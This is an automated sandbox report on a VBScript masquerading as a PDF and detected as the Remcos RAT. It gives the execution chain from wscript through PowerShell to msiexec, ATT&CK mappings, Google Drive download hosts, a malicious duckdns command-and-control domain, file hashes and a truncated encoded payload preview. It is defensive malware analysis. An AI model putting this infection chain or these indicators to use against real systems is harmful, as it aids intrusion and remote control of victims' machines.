              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523161 Sample: 18000012550_20240930_007886... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 25 drive.usercontent.google.com 2->25 27 drive.google.com 2->27 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 7 other signatures 2->43 8 wscript.exe 1 2->8         started        11 powershell.exe 18 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 45 VBScript performs obfuscated calls to suspicious functions 8->45 47 Suspicious powershell command line found 8->47 49 Wscript starts Powershell (via cmd or directly) 8->49 55 2 other signatures 8->55 15 powershell.exe 14 18 8->15         started        51 Writes to foreign memory regions 11->51 53 Found suspicious powershell code related to unpacking or dynamic code loading 11->53 19 msiexec.exe 6 11->19         started        21 conhost.exe 11->21         started        process6 dnsIp7 29 drive.usercontent.google.com 142.250.185.97, 443, 49707, 49710 GOOGLEUS United States 15->29 31 drive.google.com 216.58.206.78, 443, 49706, 49709 GOOGLEUS United States 15->31 33 Found suspicious powershell code related to unpacking or dynamic code loading 15->33 23 conhost.exe 15->23         started        35 Detected Remcos RAT 19->35 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              18000012550_20240930_0078864246#U00b7pdf.vbs13%ReversingLabsScript.Trojan.Heuristic
              18000012550_20240930_0078864246#U00b7pdf.vbs8%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              drive.google.com0%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://drive.usercontent.google.com1%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://drive.usercontent.google.com/1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		216.58.206.78
              		truefalseunknown
              drive.usercontent.google.com
              		142.250.185.97
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              a458386d9.duckdns.orgtrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1508363745.0000029181EBF000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://go.micropowershell.exe, 00000002.00000002.1508363745.0000029180E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.googPpowershell.exe, 00000002.00000002.1508363745.0000029181E81000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://drive.usercontent.googhpowershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://drive.usercontent.google.com/msiexec.exe, 00000007.00000003.1792322934.0000000007480000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.0000000007480000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://drive.google.compowershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.google.compowershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://crl.mpowershell.exe, 00000004.00000002.1844919840.0000000006F01000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://crl.micropowershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://drive.google.com/omsiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://drive.google.compowershell.exe, 00000002.00000002.1508363745.0000029180457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.000002918180D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1508363745.00000291806C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://apis.google.compowershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://drive.google.com/gmsiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      216.58.206.78
                                      		drive.google.comUnited States
                                      		15169GOOGLEUSfalse
                                      142.250.185.97
                                      		drive.usercontent.google.comUnited States
                                      		15169GOOGLEUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1523161
                                      Start date and time:2024-10-01 07:45:45 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 50s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:15
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:18000012550_20240930_0078864246#U00b7pdf.vbs
                                      renamed because original name is a hash value
                                      Original Sample Name:18000012550_20240930_0078864246pdf.vbs
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winVBS@9/7@2/2
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 90%
                                      • Number of executed functions: 61
                                      • Number of non-executed functions: 2
                                      Cookbook Comments:
                                      • Found application associated with file extension: .vbs

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 7796 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 8036 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      01:46:40API Interceptor84x Sleep call for process: powershell.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eSolicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Scanned Purchase List.vbsGet hashmaliciousUnknownBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      37f463bf4616ecd445d4a1937da06e19Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      file.exeGet hashmaliciousLodaRATBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      file.exeGet hashmaliciousXWorm, XmrigBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97
                                      Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                      • 216.58.206.78
                                      • 142.250.185.97

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8003
                                      Entropy (8bit):4.840877972214509
                                      Encrypted:false
                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                      MD5:106D01F562D751E62B702803895E93E0
                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:NlllulJnp/p:NllU
                                      MD5:BC6DB77EB243BF62DC31267706650173
                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e.................................X..............@..........

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpr5gp2x.0li.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksokqut4.z4a.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhqrbe3x.dn1.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztwtpfhm.rbg.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Roaming\Forsvarsministers.Sca

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):476220
                                      Entropy (8bit):5.972881545593495
                                      Encrypted:false
                                      SSDEEP:12288:8FtXgHSg3X58XaBqQKWrhirJwIQ/+kVNN6Jpz:8nXgyMX5yaBq2tirhFNJ5
                                      MD5:14B49DCB01461BFC4769023A403A5B1A
                                      SHA1:C30A85BF569D584E918FE93BE93494C76B119ADD
                                      SHA-256:1E8E511894D67DADB6441A4B9E9315D4F2CE396B89D6FC7631EE2FF5F103556B
                                      SHA-512:89089191D855F064B69A6B1499C25BDC0A5842E167DC17448BF18AA8AA4EC3ABB7A852BDFBFC3ACFBA7C4240602536F52EFCD31978D74E71A232E2F0EF21B42B
                                      Malicious:false
                                      Preview:cQGbcQGbu1rPDQDrAsqN6wJkrwNcJARxAZtxAZu5TpOw7usCfh/rArJ2gekjUfkpcQGb6wJTIIHB1b1IO3EBm+sCMzjrAjdecQGbulDhlpzrAphJ6wKjxesCrz7rAlWjMcrrAi6FcQGbiRQLcQGb6wK0hNHi6wJgGXEBm4PBBHEBm+sCBpaB+WaDewN8ynEBm3EBm4tEJARxAZvrAtC5icNxAZvrAq3EgcPsFrQCcQGb6wJkS7olvnWV6wJsN3EBm4HyrWdLdXEBm3EBm4HqiNk+4HEBm+sCfMrrAj2hcQGb6wKvl3EBm4sMEHEBm3EBm4kME3EBm+sC6jBC6wJUHXEBm4H6nPoEAHXW6wJbPnEBm4lcJAzrAsAF6wILIoHtAAMAAHEBm3EBm4tUJAjrAjoY6wLL5It8JATrApYB6wJOsYnr6wJrJ3EBm4HDnAAAAOsCJTTrAsRLU+sCvrBxAZtqQHEBm3EBm4nr6wIBA3EBm8eDAAEAAABgjAPrAv326wKPg4HDAAEAAOsCS7/rArsyU+sCMORxAZuJ6+sC5FJxAZuJuwQBAADrAhIa6wIyjoHDBAEAAHEBm3EBm1PrAnaFcQGbav/rAh1K6wIn9IPCBesC/vzrAsnZMfbrAmv8cQGbMclxAZvrAoZUixpxAZtxAZtBcQGbcQGbORwKdfTrAtkL6wJNG0brAjpBcQGbgHwK+7h13XEBm3EBm4tECvxxAZtxAZsp8OsCHJtxAZv/0usCadBxAZu6nPoEAOsCTWJxAZsxwHEBm3EBm4t8JAxxAZvrAqUXgTQHlq9fznEBm+sCXaGDwARxAZvrApg6OdB15HEBm3EBm4n76wJSkusCEij/13EBm+sCqSAfStZzplCgMSkq/K+0Lqjcq1oJT3mkJnOPLrBCtHgF52ok4v5pUKD3TPrWK65s5hKi3Eg2F17T93YROfdFKodPZ1icFebJZgUSQd4nGWEXF/AqhAnSol/3NcreT+KiX4I7

                                      Static File Info

                                      General

